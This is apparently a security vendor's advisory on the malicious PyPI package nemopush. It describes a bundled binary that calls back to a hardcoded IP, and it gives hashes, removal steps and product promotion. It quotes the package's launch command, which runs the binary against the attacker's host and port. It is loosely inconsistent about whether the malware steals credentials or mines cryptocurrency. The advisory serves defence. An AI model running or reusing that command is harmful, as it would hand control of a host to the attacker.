Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Part of a larger attack: 2026-07-kimichat published 8 malicious packages. See the full campaign →
Malicious package

nemopushPyPI

nemopush is a confirmed malicious PyPI package (MAL-2026-10866) that steals credentials and exfiltrates sensitive data (malicious versions 0.1.0, 0.1.1, 0.1.2…). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in nemopush (PyPI)

MAL-2026-10866
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall nemopush

What this malware does

The package advertises itself as 'A push notification package' but ships an ~8.6 MB opaque ELF x86-64 binary named claude and a start.sh wrapper as package data (declared in pyproject.toml under [tool.setuptools.package-data]). The pypi entry point nemopush-run (nemopush.main:run) invokes subprocess.run(["bash", script_path]), and start.sh runs chmod +x./claude followed by ./claude --host 45.151.62.119:3361 --user <hardcoded per-install token>. Running the advertised command executes attacker-controlled native code on the installer's host that establishes an outbound connection to a hardcoded bare-IP endpoint, identifying itself with a per-install token — the shape of a remote agent / backdoor. There is no README, no source, no build recipe, no hash or signature for the binary, and the destination is neither the publisher's domain nor version-pinned. The declared 'push notification' purpose does not match shipping and executing an opaque native binary that phones home to a bare IP.

In this campaign, packages use names similar to popular services (e.g. Kimi AI) to deploy cryptominer.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-07-kimichat

Reasons (based on the campaign):

  • cryptominer

Malicious versions

4 flagged
0.1.00.1.10.1.20.1.3

Indicators of compromise (SHA-256)

b1717e80fb3423ed246cbcaacb39cfa13526d2f2520a8de1229cd3388e391059
7729c96b4f8bc781774f790f0e78128e631e0218772c2a4e713a1cd1c7a714b1
d7f6db34746067c071c225ab6a64ce6a3cbe30b6c51ef69a46973540fd409ced
d8cff69298fceebac650ecae87e31b44814b97ed31c78fb406aafb2f1582d673
58d2958d0307dfe5b73dc1eef5a46e96c25f94ea31a0b4ab8b43a1878d427d2d
27df2abf09b6b353bbd8b9ec9835ce135971e6291fc1f2a3f50944862d062ca8

Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for nemopush (4 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging nemopush across your stack and pipelines.

  2. If you installed it — respond

    nemopush is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If nemopush was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks nemopush before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. nemopush on PyPI has been identified as a malicious package (versions 0.1.0, 0.1.1, 0.1.2, 0.1.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

2026-07-kimichatIN-MAL-2026-011224IN-MAL-2026-011187IN-MAL-2026-011146IN-MAL-2026-013356

References

Credits

  • Amazon Inspector · finder
  • Kamil Mańkowski (kam193) · reporter

Detect & block this

O3 blocks nemopush-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Explore

nemopush (PyPI) malicious package — MAL-2026-10866 | O3 Security